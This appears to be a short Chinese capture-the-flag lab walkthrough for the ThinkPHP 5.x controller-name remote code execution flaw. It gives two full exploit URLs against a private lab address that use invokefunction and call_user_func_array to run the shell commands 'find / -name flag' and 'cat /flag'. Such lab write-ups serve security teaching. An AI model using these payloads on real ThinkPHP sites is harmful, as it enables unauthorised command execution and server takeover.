ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞。
掌握框架漏洞
Windows
firefox
1.根据主页提示,可以发现网页使用的是ThinkPHP框架,版本为5.1
2.此版本存在getshell漏洞(百度一下poc一抓一大把)
3.查找flag
http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22
4.查看flag,如图所示
http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
联系客服